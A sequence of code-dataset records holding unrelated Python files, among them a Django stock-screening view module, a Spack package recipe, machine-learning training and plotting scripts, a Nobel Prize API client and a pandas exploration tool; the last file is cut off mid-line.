k_other_data.last()[1] and k_other_data.last()[\n 2] != '-'): # 如果最后一天的收盘价或者主力成本不存在,或者涨跌幅为'-',则过滤掉该函数\n continue\n else:\n stock_id1.append(k)\n except Exception as e:\n print('switch number error:', e, k)\n continue\n\n stocks1 = stocks.filter(stock_id__in=stock_id1, stock_date=tradeday_0)\n judge1 = stocks1.values_list('stock_id', 'price_close', 'main_cost', 'var_degree')\n judge2 = [s for s in judge1 if\n float(s[1]) - float(s[2]) <= 0.1 and float(s[3][:-1]) < 9.8] # 收盘价-主力成本<=0.1 并且当天涨幅<9.8%\n sorted_judge = sorted(judge2, key=lambda s: float(s[1]) - float(s[2])) # 以(收盘价-开盘价)由小到大排序\n stocks_id2 = sorted_judge[:20] # 前特定数量的股票,不足也行\n stocks_id2_1 = [s[0] for s in stocks_id2] # 取出股票代码\n return stocks_id2_1\n\n\ndef stock_yes_test(stock_list_yes, index_day):\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n stocks_all_yes = CashFlowData.objects.filter(stock_date=tradeday_0) # 采用了CashFlowDat的数据库,所以最好每日17点后更新\n data_var_degree = stocks_all_yes.values_list('var_degree', flat=True)\n sorted_var_degree = sorted((float(x[:-1]) if x.endswith('%') else 0 for x in data_var_degree),\n reverse=True) # 将涨跌幅按照从小到大排序\n data_yes = stocks_all_yes.filter(stock_id__in=stock_list_yes).values('stock_id', 'stock_name',\n 'var_degree') # 特定股票数据\n stocks_yes = [] # 记录前一日的股票\n for eachdata in data_yes:\n each_var_degree = eachdata['var_degree']\n eachdata['var_degree'] = each_var_degree if each_var_degree.endswith('%') else '0%'\n vd = float(each_var_degree[:-1]) if each_var_degree.endswith('%') else 0 # 去掉百分号后的单支股票涨跌幅\n eachdata['vd'] = vd\n each_count = len([x for x in sorted_var_degree if x > vd]) + 1 # 每支股票的涨跌排名\n eachdata['var_count'] = each_count # 加入单支股票的字典中\n stocks_yes.append(eachdata)\n\n if stocks_yes:\n stocks_yes = sorted(stocks_yes, key=lambda x: x['vd'], reverse=True) # 将股票按照涨跌幅重新排序\n\n average_var = sum(x['vd'] for x in stocks_yes) / len(stocks_yes) # 股票的平均涨跌幅\n average_count = len([x for x in sorted_var_degree if x > average_var]) + 1 # 平均涨跌幅对应的涨跌排名\n average_var = '{:0.2f}'.format(average_var) + '%'\n\n return stocks_yes, average_var, average_count\n\n\n# capital 的 session3 函数\ndef capital_session3(request):\n now = datetime.now() # 获取实时时间\n index_day = 1\n try:\n stock_cid_yes = CStockList.objects.get(pk=1) # 运行速度快\n except Exception:\n stock_cid_yes = CStockList.objects.get_or_create(stock_cid_yes=CashFlowStrategy2(index_day + 1),\n defaults={'pk': 1}) # 运行速度慢,每次都要计算CashFlowStrategy2函数\n stock_cid_yes = stock_cid_yes[0]\n stock_cid_yes = stock_cid_yes.stock_cid_yes\n if isinstance(stock_cid_yes, str):\n stock_cid_yes = eval(stock_cid_yes) # 如此将stock_cid_yes 变成list\n\n try:\n stock_cid_now = CStockList.objects.get(pk=2)\n except Exception:\n stock_cid_now = CStockList.objects.get_or_create(stock_cid_now=CashFlowStrategy2(index_day), defaults={'pk': 2})\n stock_cid_now = stock_cid_now[0]\n stock_cid_now = stock_cid_now.stock_cid_now\n if isinstance(stock_cid_now, str):\n stock_cid_now = eval(stock_cid_now)\n\n try:\n cflag = CStockList.objects.get(pk=3)\n except Exception:\n cflag = CStockList.objects.get_or_create(cflag=0, defaults={'pk': 3})\n cflag = cflag[0]\n cflag = int(cflag.cflag)\n\n if now.hour >= 17 and not cflag:\n stock_cid_new = CashFlowStrategy2(index_day)\n CStockList.objects.filter(pk=3).update(cflag=1)\n if stock_cid_now != stock_cid_new: # 如果不相等,说明数据有更新\n stock_cid_yes = stock_cid_now\n CStockList.objects.filter(pk=1).update(stock_cid_yes=stock_cid_yes)\n stock_cid_now = stock_cid_new\n CStockList.objects.filter(pk=2).update(stock_cid_now=stock_cid_now)\n if now.hour < 17 and cflag: # 其余时间删除count_new的session\n CStockList.objects.filter(pk=3).update(cflag=0)\n\n return stock_cid_yes, stock_cid_now\n\n\ndef c_control_strategy(index_day): # 根据主力控盘,结合资金流的选股策略\n (*_, tradeday_0, tradeday_1) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为2\n stocks = CashFlowData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n stocks_yes = stocks.filter(Q(control_type='不控盘') | Q(control_type='轻度控盘'), stock_date=tradeday_1) # 注意此处使用了Q对象查询方法\n stock_id_yes = stocks_yes.values_list('stock_id', flat=True) # 获取昨日的股票代码\n\n # 去掉当天主力成本价远低于收盘价的股票\n # stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'price_close',\n # 'main_cost')\n # stock_id_yes = [s[0] for s in stocks_t1 if float(s[1]) - float(s[2]) <= 0.5] # 收盘价-成本价小于: 0.1\n\n # 去掉当天主力净流入超过一定数额的股票\n stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'maincash_in')\n stock_id_yes = [s[0] for s in stocks_t1 if not s[1].startswith('-')] # 取消主力净流出的股票\n\n stocks0 = stocks.filter(stock_id__in=stock_id_yes)\n datas0 = stocks0.values_list('stock_id', 'join_degree')\n datas1 = defaultdict(list)\n for k, v in datas0:\n datas1[k].append(float(v[:-1]))\n\n datas2 = [(k, datas1[k][1] - datas1[k][0]) for k in datas1 if len(datas1[k]) == 2]\n datas2_sort = sorted(datas2, key=lambda s: s[1], reverse=True)\n datas3 = datas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in datas3]\n\n print(stock_id)\n\n return stock_id\n\n\ndef c_control_strategy2(index_day): # 根据主力控盘,结合资金流的选股策略,当日主力净占比小于特定值\n (*_, tradeday_0, tradeday_1) = CashFlowData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 获取最近的交易日,\"[]\"中的数最小为2\n stocks = CashFlowData.objects.filter(stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n stocks_yes = stocks.filter(stock_date=tradeday_1).values_list('stock_id', 'maincash_in_rate')\n stocks_yes = [s for s in stocks_yes if s[1].endswith('%')]\n stock_id_yes = [s[0] for s in stocks_yes if float(s[1][:-1]) < -20] # 昨日主力净占比小于特定数值的股票代码\n\n # 去掉当天主力成本价远低于收盘价的股票\n # stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id', 'price_close',\n # 'main_cost')\n # stock_id_yes = [s[0] for s in stocks_t1 if float(s[1]) - float(s[2]) <= 0.5] # 收盘价-成本价小于: 0.1\n\n # 选取当天主力净占比小于一定数额的股票\n stocks_t1 = stocks.filter(stock_date=tradeday_0, stock_id__in=stock_id_yes).values_list('stock_id',\n 'maincash_in_rate')\n stocks_t1 = [s for s in stocks_t1 if s[1].endswith('%')]\n stock_id_yes = [s[0] for s in stocks_t1 if 0 < float(s[1][:-1]) < 5] # 当日主力净流入绝对值小于特定数值的股票\n\n stocks0 = stocks.filter(stock_id__in=stock_id_yes)\n datas0 = stocks0.values_list('stock_id', 'join_degree')\n datas1 = defaultdict(list)\n for k, v in datas0:\n datas1[k].append(float(v[:-1]))\n\n datas2 = [(k, datas1[k][1] - datas1[k][0]) for k in datas1 if len(datas1[k]) == 2]\n datas2_sort = sorted(datas2, key=lambda s: s[1], reverse=True)\n datas3 = datas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in datas3]\n\n print(stock_id)\n\n return stock_id\n\n\ndef c_middle_strategy(index_day=1): # 资金流中线选股策略,净流入资金占比最少,最后一天净流入\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day] # 提取中国银行交易日日期数据,本行第一个数字为控制变量,默认且最小为1.\n stocks_0 = CashFlowData.objects.filter(stock_date=tradeday_0)\n judge_0 = stocks_0.values_list('stock_id', 'maincash_in')\n stock_id_list0 = [s[0] for s in judge_0 if not s[1].startswith('-')] # 去掉净流出的股票代码\n\n stocks = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date__lte=tradeday_0)\n datas0 = stocks.values_list('stock_id', 'maincash_in')\n datas1 = defaultdict(list)\n for k, v in datas0:\n if v != '-': # 去掉当天无净流入的数据\n datas1[k].append(v)\n\n datas2 = [] # 储存股票代码与占比数据\n for k in datas1:\n pos_maincash = [] # 储存净流入的股票数据\n neg_maincash = [] # 储存净流出的股票数据\n maincash_in = datas1[k]\n if len(maincash_in) < 64 - index_day: # 去掉各种新股,不连续的股票\n continue\n for each_cash in maincash_in:\n if each_cash.endswith('万'):\n num_cash = float(each_cash[:-1])\n elif each_cash.endswith('亿'):\n num_cash = float(each_cash[:-1]) * 10 ** 4\n else: # 小于万的净流入/出数据\n num_cash = float(each_cash[:-1]) / 10 ** 4\n if num_cash > 0:\n pos_maincash.append(num_cash)\n else:\n neg_maincash.append(num_cash)\n try:\n diff = sum(pos_maincash) / abs(sum(neg_maincash)) # 净流入占净流出的比例\n except Exception:\n print('division by zero:', k)\n continue\n datas2.append((k, diff))\n\n datas2_sort = sorted(datas2, key=lambda s: s[1])\n datas3 = datas2_sort[:10]\n stock_id = [s[0] for s in datas3]\n\n return stock_id\n\n\n# @cache_page(60 * 15) # 有了session后,貌似不用缓存也很快了,最终不用session也快了.\ndef capital(request):\n visitcount(request)\n # 删除过期数据...\n cdata_dated = CashFlowData.objects.filter(stock_date__lte=day_fixed_before_cdata) # 筛选出过时数据\n cdata_dated.delete() # 删除\n\n context_dict = {}\n\n now = datetime.now() # 获取实时时间\n\n workday = [0, 1, 2, 3, 4]\n if (now.weekday() in workday) and (15 <= now.hour < 17): # 工作日的15:00-17:00之间\n context_dict['time_blank'] = '17点后更新'\n # count_cnew = 0\n else:\n # stock_id_list = ['603016'] # 测试用\n\n index_day = 1 # 最小为1(当前), 2(前一天)\n (*_, tradeday_0) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day', order='DESC')[\n :index_day]\n\n stock_id_list = c_control_strategy2(index_day + 1)\n stock_id_list_yes = c_control_strategy2(index_day + 2)\n # stock_id_list = c_middle_strategy(index_day + 0)\n # stock_id_list_yes = c_middle_strategy(index_day + 1)\n context_dict['trade_day'] = tradeday_0\n\n # stock_id = capital_session3(request) # session函数\n # stock_id_list = stock_id[1]\n # stock_id_list_yes = stock_id[0] # 前一天,用来回测数据\n # count_cnew = stock_id[2] # 从session函数返回的count_new,记录stock_id_now与stock_id_new是否相等的状态\n\n stocks_yes = stock_yes_test(stock_id_list_yes, index_day) # 前一天选择的股票进行测试\n\n if stocks_yes:\n context_dict['stocks_yes'] = stocks_yes[0]\n context_dict['average_var'] = stocks_yes[1]\n context_dict['average_count'] = stocks_yes[2]\n context_dict['stocks'] = ChangeToEchartsData_cdata(stock_id_list)\n\n response = render(request, 'choose_stock/capital.html', context_dict)\n # expire_day = cookie_expire_time(17) # 每天的16时为cookie的更新时间\n # response.set_cookie('count_cnew', count_cnew, expires=expire_day)\n # response.set_cookie('count_cnew', count_cnew, max_age=60 * 10) # 设置cookie过期时间为10分钟\n\n return response\n\n\n# ---------------------------个股讯息--------------------------------------\ndef search(request):\n visitcount(request)\n context = {}\n if request.method == 'POST':\n id_name = request.POST['id_name'] # 对应模板中input的name值\n stock_id_name = Name_Id.objects.all().values_list('stock_id', 'stock_name') # 取得所有的股票代码及名称\n special_stock = [s for s in stock_id_name if id_name in s]\n if special_stock:\n return redirect('choose_stock.views.stock_detail', stock_id=special_stock[0][0]) # 必须加上return\n else:\n context['info'] = '无此股票讯息,请重新输入'\n return render(request, 'choose_stock/search.html', context)\n\n\ndef stock_detail(request, stock_id):\n visitcount(request)\n context = {}\n stock_id1 = [stock_id]\n try:\n context['stock_c'] = ChangeToEchartsData_cdata(stock_id1)[0]\n context['stock_k'] = ChangeToEchartsData_kdata(stock_id1)[0]\n stock_name = Name_Id.objects.filter(stock_id=stock_id).values_list('stock_name', flat=True)[0]\n context['news'] = News.objects.filter(content__contains=stock_name).order_by('-published_time')\n except Exception as e:\n print('read stock information error:', e, stock_id)\n return render(request, 'choose_stock/stock_detail.html', context)\n\n\n# -----------------------------访客统计--------------------------------\ndef visitcount(request):\n ip_address = request.META['REMOTE_ADDR']\n visit_time = datetime.now()\n visit_page = request.path\n visit_device = request.META['HTTP_USER_AGENT']\n VisitData.objects.create(ip_address=ip_address, visit_time=visit_time, visit_page=visit_page,\n visit_device=visit_device) # 保存数据\n\n\ndef visitdata(request):\n visits_dated = VisitData.objects.filter(visit_time__lte=day_fixed_before_visit) # 筛选出过时数据\n visits_dated.delete() # 删除\n\n context_dict = {}\n visits_today = VisitData.objects.filter(visit_time__day=now.day).order_by('-visit_time') # 昨日访客\n visits_yes = VisitData.objects.filter(visit_time__day=yesterday.day).order_by('-visit_time') # 今日访客\n context_dict['visits_today'] = visits_today\n context_dict['visits_yes'] = visits_yes\n return render(request, 'choose_stock/visitdata.html', context_dict)\n\n# 待办事项:\n# 1.优化k线图的选股策略:当日主力资金净流入大于0,主力净流入从高到低排序,观察历史数据------基本成功------\n# 2.添加session,保存上一日选择的股票------基本成功------\n# 3.修改删除到期股票的方法,尝试用总数控制的方式--不成功\n# 4.优化资金流选股策略:结合主力是否控盘,观察历史数据\n# 5.改变网络的前端布局,目前太丑了\n# 6.每个新闻页增加相关历史消息\n# 7.结合情感分析,优化利好/利空消息的选择\n# 8.网站访问统计\n# 9.K线图停盘数据优化------成功------\n# 10.股票的超链接优化------成功------\n# 11.回测表格的手机端优化\n# 12.搜索页优化,不要单独放一个页面\n# 13.股票昨日与今日数据储存优化------成功------\n# 14.探索当日资金净流入的绝对值小于某个小的数(如1500万),但主力参与度较高的股票\n# 15.探索当日股价下跌,但资金净流入的股票;或连续股价下跌,但资金连续净流入的股票.\n# 16.东方财富网资金流界面数据更新经常不及时,考虑换用腾讯股票接口获取资金流数据.\n","repo_name":"sass1s/Choose_Stock","sub_path":"choose_stock/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":70304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39928416337","text":"from spack import *\nimport os\nimport sys\nimport spack\n\nclass Dplasma(Package):\n \"\"\"Distributed Parallel Linear Algebra Software for Multicore Architectures\"\"\"\n homepage = \"http://icl.utk.edu/dplasma/\"\n url = \"http://icl.cs.utk.edu/projectsfiles/parsec/pubs/dplasma-1.2.1.tgz\"\n\n version('1.2.1', '8b899ba331926997ea96fbc381e2b6cd')\n version('1.2.0', 'f40c36139b6a1b526d2505d1e0237748')\n version('1.1.0', '72e1eec916be379ddb9dcd45c7a4b593')\n pkg_dir = spack.repo.dirname_for_package_name(\"fake\")\n # fake tarball because we consider it is already installed\n version('exist', '7b878b76545ef9ddb6f2b61d4c4be833',\n url = \"file:\"+join_path(pkg_dir, \"empty.tar.gz\"))\n version('src')\n\n variant('mpi', default=True, description='Enable MPI')\n variant('cuda', default=False, description='Enable CUDA')\n variant('mkl', default=False, description='Use BLAS/LAPACK from the Intel MKL library')\n variant('papi', default=False, description='Enable PAPI')\n\n depends_on(\"cmake\")\n depends_on(\"hwloc\")\n depends_on(\"plasma\")\n depends_on(\"mpi\", when='+mpi')\n depends_on(\"papi\", when='+papi')\n\n def install(self, spec, prefix):\n cmake('.', *std_cmake_args)\n\n make()\n make(\"install\")\n\n # to use the existing version available in the environment: DPLASMA_DIR environment variable must be set\n @when('@exist')\n def install(self, spec, prefix):\n if os.getenv('DPLASMA_DIR'):\n dpalsmaroot=os.environ['DPLASMA_DIR']\n if os.path.isdir(dpalsmaroot):\n os.symlink(dpalsmaroot+\"/include\", prefix.include)\n os.symlink(dpalsmaroot+\"/lib\", prefix.lib)\n else:\n raise RuntimeError(dpalsmaroot+' directory does not exist.'+' Do you really have openmpi installed in '+dpalsmaroot+' ?')\n else:\n raise RuntimeError('DPLASMA_DIR is not set, you must set this environment variable to the installation path of your dpalsma')","repo_name":"gmarait/spack","sub_path":"var/spack/repos/builtin/packages/dplasma/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"36109103134","text":"from numpy import *\nimport math\nimport xlrd\nimport numpy as np\nimport openpyxl\nimport datetime\nimport matplotlib.pyplot as plt\nfrom pylab import *\nimport matplotlib.dates as mdates\nimport mpl_toolkits.axisartist as axisartist\ndef norm_pdf_multivariate(x, mu, sigma):\n size = len(x)\n if size == len(mu) and (size, size) == sigma.shape:\n det = linalg.det(sigma)\n if det == 0:\n raise NameError(\"The covariance matrix can't be singular\")\n\n norm_const = 1.0/ (math.pow((2*pi),float(size)/2) * math.pow(det,1.0/2) )\n x_mu = matrix(x - mu)\n inv = sigma.I \n result = math.pow(math.e, -0.5 * (x_mu * inv * x_mu.T))\n return norm_const * result\n else:\n raise NameError(\"The dimensions of the input don't match\")\n\n#读取清洗后的数据\n\ndatasigma = [];datatimeYes = []\ndata_xsls = xlrd.open_workbook(\"./data/14A17Process.xlsx\") #打开此地址下的exl文档\n#data_xsls = xlrd.open_workbook(\"13ANew.xls\") \nsheet_name = data_xsls.sheets()[0] \ncount_nrows = sheet_name.nrows \nfor i in range(1,count_nrows,10):\n if i < 3000 or (i>250000 and i<300000) or(i>380000 and i<490000) or (i > 760000 and i< 820000):\n #if i < 3000 or (i>260000 and i<290000) or (i > 390000 and i< 480000) or (i>770000 and i<810000):\n #if i < 3000 or (i>50000 and i<100000) or (i > 330000 and i< 350000) or (i>850000 and i<990000):\n pass\n else:\n b = []\n for j in range(9):\n b.append(sheet_name.cell_value(i,j+1))\n datasigma.append(b)\n a = xlrd.xldate_as_tuple(sheet_name.cell_value(i,0),0)\n datatimeYes.append(datetime.datetime(*a))\n\n#生成均值和协方差矩阵\nsigma = matrix(cov(array(datasigma).T))\nmean = []\nfor i in range(9):\n l = len(datasigma)\n mean.append(sum(datasigma[j][i]for j in range(l))/l)\nmu = array(mean)\n\ndata = [];datatime = []\ndata_xsls = xlrd.open_workbook(\"./data/14A17Process.xlsx\") #打开此地址下的exl文档\n#data_xsls = xlrd.open_workbook(\"13ANew.xls\") \nsheet_name = data_xsls.sheets()[0] \ncount_nrows = sheet_name.nrows \nfor i in range(380000,405000):\n b = []\n for j in range(9):\n b.append(sheet_name.cell_value(i,j+1))\n data.append(b)\n a = xlrd.xldate_as_tuple(sheet_name.cell_value(i,0),0)\n datatime.append(datetime.datetime(*a))\n\nY = []\nfor i in range(len(data)):\n a = norm_pdf_multivariate(data[i], mu, sigma)\n if a > 1*pow(10,-7):\n a = 1*pow(10,-7)\n Y.append(a)\n\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus']=False\nfont1 = {\n'weight' : 'normal',\n'size' : 12,\n}\n\nplt.xlabel('日 期',font1)\nplt.ylabel('多元高斯分布计算得到的P(X)',font1)\nplt.xticks(rotation = 20)\nplt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))\nplt.scatter(datatime,Y,marker='o',s=3,color = 'b',label='P(Xi)')\nZ = [5*pow(10,-8) for i in range(len(Y))]\nplt.plot(datatime,Z,marker='o',markersize=2,color = 'r',label='阈值ε')\nplt.legend()\n#plt.title('14号机组一次风机A2017年处理后运行数据',font1)\nplt.show()\n\n\n\n","repo_name":"Eureke-Ch/failure-warning-of-ower-plant-auxiliary-equipment","sub_path":"figure_yuzhi.py","file_name":"figure_yuzhi.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"21912800297","text":"import requests\n\n\ndef download_prize_data():\n \"\"\"This function download the data as json for further use\"\"\"\n r = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\")\n r2 = r.json()\n return r2\n\n\ndef category_prize():\n category = {\"fysik\": \"phy\",\n \"kemi\": \"che\",\n \"litteratur\": \"lit\",\n \"ekonomi\": \"eco\",\n \"fred\": \"pea\",\n \"medicin\": \"med\"}\n return category\n\n\ndef find_winner_by_year_and_category():\n category = category_prize()\n try:\n year = input(f\"Year >\")\n p_category = input(f\"\\033[96mPrize category > \\n\")\n c = category[p_category]\n c = {\"nobelPrizeYear\": int(year), \"nobelPrizeCategory\": c}\n\n res = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\", params=c).json()\n\n for p in res[\"nobelPrizes\"]:\n pengar = p[\"prizeAmount\"]\n print(f\"\\033[97m{p['categoryFullName']['se']} prissumma {pengar} SEK\")\n\n winner = p[\"laureates\"]\n for num, m in enumerate(winner, start=1):\n print(f\"[{num}] Namnet på vinnaren är: {m['knownName']['en']}\")\n print(f\"\\033[94mMotivation: \\033[97m{m['motivation']['en']}\")\n except KeyError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n\n\ndef find_winners_prize():\n prize_data = download_prize_data()\n for data in prize_data[\"nobelPrizes\"]:\n print(f\"{data['awardYear']} : {data['prizeAmount']}\")\n for f in data[\"laureates\"]:\n portion = f[\"portion\"]\n\n\ndef winners_by_year():\n try:\n year = input(f\"Year >\")\n c = {\"nobelPrizeYear\": int(year)}\n\n res = requests.get(\"http://api.nobelprize.org/2.1/nobelPrizes\", params=c).json()\n prize = res[\"nobelPrizes\"]\n for num, p in enumerate(prize, start=1):\n print(f\"[{num}] {p['category']['en']}\")\n pengar = p[\"prizeAmount\"]\n print(f\"\\033[97m{p['categoryFullName']['se']} prissumma {pengar} SEK\")\n for m in p[\"laureates\"]:\n # print(m[\"knownName\"])\n print(f\"\\033[94mMotivation: \\033[97m{m['motivation']['en']}\")\n except KeyError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n except ValueError:\n print(f\"\\033[94mPlease enter a year number and category instead.\\n\")\n","repo_name":"Rubaakter/Myrepo","sub_path":"tentamen/tenta_functions.py","file_name":"tenta_functions.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19262079866","text":"# loading libraries\nfrom plot import Plot as Plot \nfrom pathlib import Path\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.metrics import confusion_matrix\n\nclass LearnAlgorithms(object):\n\n def __init__(self, train, test):\n self.X_train = train.images\n self.Y_train = train.labels\n\n self.X_test = test.images\n self.Y_test = test.labels\n\n def knnLearn(self, k, train):\n # instantiate learning model (k = 3)\n knn = KNeighborsClassifier(n_neighbors=k)\n\n if Path('../models/KnnModel.pkl').is_file() and not train:\n self.log(\"Loading KNN Model\")\n knn = joblib.load('../models/KnnModel.pkl')\n else:\n # fitting the model\n self.log(\"Fitting KNN Model\")\n knn.fit(self.X_train, self.Y_train)\n joblib.dump(knn, '../models/KnnModel.pkl')\n # predict the response\n self.log(\"Predicting KNN Tests\")\n pred = knn.predict(self.X_test)\n # evaluate accuracy\n self.log(\"KNN Accuracy Score: {}\".format(accuracy_score(self.Y_test, pred)))\n\n cof_mat = confusion_matrix(self.Y_test, pred)\n return cof_mat\n\n def ldaLearn(self, train):\n clf = LinearDiscriminantAnalysis()\n\n if Path('../models/LdaModel.pkl').is_file() and not train:\n self.log(\"Loading LDA Model\")\n clf = joblib.load('../models/LdaModel.pkl')\n else:\n # fitting the model\n self.log(\"Fitting LDA Model\")\n clf.fit(self.X_train, self.Y_train)\n joblib.dump(clf, '../models/LdaModel.pkl')\n # predict the response\n self.log(\"Predicting LDA Tests\")\n pred = clf.predict(self.X_test)\n # evaluate accuracy\n self.log(\"LDA Accuracy Score: {}\".format(accuracy_score(self.Y_test, pred)))\n\n cof_mat = confusion_matrix(self.Y_test, pred)\n return cof_mat\n\n def log(self, msg):\n print('[Learn] {}'.format(msg))","repo_name":"Skalwalker/NumberRecognition","sub_path":"scripts/learnAlgorithms.py","file_name":"learnAlgorithms.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19602953876","text":"from django.shortcuts import render\n\nfrom app.models import Recipe\n\n\ndef recipe_details(request, pk):\n recipe = Recipe.objects.get(pk=pk)\n ingredients = recipe.ingredients.split(', ')\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients,\n }\n\n return render(request, 'details.html', context)\n","repo_name":"ilievpavel/Recipes","sub_path":"app/views/details.py","file_name":"details.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71532667032","text":"import yaml\nfrom glob import glob\nimport pickle \nimport joblib\nimport os, sys\nfrom pathlib import Path\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\nimport lightgbm as lgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom modules.tuner import *\n\ndef ordinal_encoding(df_input, encoding_lst, save_dir):\n df = df_input.copy()\n oe = OrdinalEncoder()\n oe.fit(df[encoding_lst])\n np.save(f'{save_dir}encoding.npy', oe)\n print(f'Encoding file saved to: {save_dir}')\n return oe\n\ndef train_model(config, params, evals_result, path, **dataset):\n if config['TRAIN']['optuna']['use']:\n N_TRIALS = config['TRAIN']['optuna']['trials']\n study = optuna.create_study(direction='minimize')\n study.optimize(lambda trial: objective(trial, params, evals_result=evals_result,\n path=path, **dataset), n_trials=N_TRIALS, callbacks=[callback_study])\n params.update(study.best_trial.params)\n model = study.user_attrs['best_model']\n df_loss = study.user_attrs['best_loss']\n \n else:\n train_data = lgb.Dataset(dataset['X_train'],\n label=dataset['y_train'],\n categorical_feature=dataset['CAT_FEATURES'],\n free_raw_data=False)\n valid_data = lgb.Dataset(dataset['X_valid'],\n dataset['y_valid'],\n categorical_feature=dataset['CAT_FEATURES'],\n free_raw_data=False)\n model = lgb.train(params\n ,train_set=train_data\n ,valid_sets=[train_data, valid_data]\n ,valid_names = ['train', 'valid']\n ,evals_result=evals_result\n # ,num_boost_round=5000\n ,early_stopping_rounds=1000\n ,verbose_eval=10\n )\n df_loss = pd.DataFrame({key: evals_result[key][params['metric']] for key in evals_result.keys()})\n \n return params, model, df_loss\n\ndef save_loss(df_loss, path):\n sns.lineplot(data=df_loss, x=df_loss.index, y='train', label='train', color='#5392cd')\n sns.lineplot(data=df_loss, x=df_loss.index, y='valid', label='valid', color='#dd8452')\n plt.title('loss', fontsize=30)\n make_single_directory(f'{path}')\n plt.savefig(f'{path}/loss.png', dpi=300)\n plt.clf()\n df_loss.to_csv(f'{path}/loss.csv', index=False)","repo_name":"hyuntai97/ML_pipeline","sub_path":"modules/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18723272867","text":"import argparse\nimport os\nimport pandas as pd\nimport sys\n\n\nclass DataInput:\n\n def __init__(self, path, dtype, orient=None):\n self.path = path\n self.dtype = dtype\n self.orient = orient\n if self.dtype == \"csv\":\n self.df = pd.read_csv(self.path)\n elif self.dtype == \"tsv\":\n self.df = pd.read_csv(self.path, sep='\\t')\n elif self.dtype == \"json\":\n if self.orient == None:\n sys.exit('Provide \"--orient\" parameter for JSON')\n else:\n self.df = pd.read_json(self.path, orient=self.orient, typ='frame')\n self.columns = list(self.df.columns.values)\n self.length = len(self.df.index)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Explore your data with Pandas!')\n parser.add_argument('path',\n metavar='path',\n type=str,\n help='the path to your input file')\n parser.add_argument(\"-t\", \"--type\",\n choices=[\"csv\", \"json\", \"tsv\"],\n required=True, help=\"Required: the input data type\")\n parser.add_argument(\"-o\", \"--orient\",\n choices=[\"split\", \"records\", \"index\", \"columns\", \"values\", \"table\"],\n required=False, help=\"For JSON: define orientation\")\n\n args = parser.parse_args()\n path = args.path\n\n if not os.path.exists(path):\n print('The path specified does not exist')\n sys.exit()\n dtype = args.type\n orient = args.orient\n\n print(\"Input Data: {}\".format(path))\n d = DataInput(path, dtype, orient)\n df = d.df\n columns = d.columns\n length = d.length\n print(\"Your object is 'd' and your df is 'df'.\")\n print(\"Your df length: {}\".format(length))\n print(\"Your df has {} columns.\".format(len(columns)))\n print(\"Your df columns: {}\".format(columns))\n print(\" \")\n print(\"Entering Interaction: (press 'Ctrl-d' to exit)\")\n print(\" \")\n print(\"For example, run: >>> df.head()\")\n print(\" \")\n import code\n code.interact(local=locals())\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"ajp3979/data_interact","sub_path":"data_interact/data_interact.py","file_name":"data_interact.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6951725266","text":"#!/usr/bin/env python3\n\n#\n# Mathieu Marchildon\n#\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport turtle\nfrom turtle import *\n\nfilename = f\"../inputs/day09-input.txt\"\n#filename = f\"../inputs/day09-test-input.txt\"\n\nfile = open(filename, \"r\")\nlines = file.readlines()\nlines[:] = [line.strip().split() for line in lines]\n\n\nx = 0\ny = 0\nhead = [[x, y]]\n\nfor line in lines:\n direction = 